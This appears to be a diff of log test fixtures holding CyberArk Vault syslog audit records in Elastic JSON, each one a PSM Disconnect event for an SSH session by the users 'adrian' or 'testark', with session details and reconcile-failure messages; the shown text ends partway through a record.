-<5>1 2021-03-15T14:08:11Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:08:11</Timestamp>\n    <IsoTimestamp>2021-03-15T14:08:11Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:11","IsoTimestamp":"2021-03-15T14:08:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<5>1 2021-03-15T14:08:36Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:08:36</Timestamp>\n    <IsoTimestamp>2021-03-15T14:08:36Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814025\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:36","IsoTimestamp":"2021-03-15T14:08:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}}
-<5>1 2021-03-15T15:00:21Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 08:00:21</Timestamp>\n    <IsoTimestamp>2021-03-15T15:00:21Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"1\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615819476\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:00:21","IsoTimestamp":"2021-03-15T15:00:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}}
+<5>1 2021-03-11T17:38:26Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:26</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:26Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:26","IsoTimestamp":"2021-03-11T17:38:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-11T17:47:01Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:47:01</Timestamp>\n    <IsoTimestamp>2021-03-11T17:47:01Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:47:01","IsoTimestamp":"2021-03-11T17:47:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-11T17:48:40Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:48:40</Timestamp>\n    <IsoTimestamp>2021-03-11T17:48:40Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:40","IsoTimestamp":"2021-03-11T17:48:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-11T17:55:02Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:55:02</Timestamp>\n    <IsoTimestamp>2021-03-11T17:55:02Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:55:02","IsoTimestamp":"2021-03-11T17:55:02Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-11T17:56:42Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:56:42</Timestamp>\n    <IsoTimestamp>2021-03-11T17:56:42Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:42","IsoTimestamp":"2021-03-11T17:56:42Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-11T20:23:30Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 12:23:30</Timestamp>\n    <IsoTimestamp>2021-03-11T20:23:30Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:30","IsoTimestamp":"2021-03-11T20:23:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-14T13:49:54Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:54</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:54Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>302</MessageID>\n    <Desc>PSM Disconnect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Disconnect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Disconnect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615729572\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" 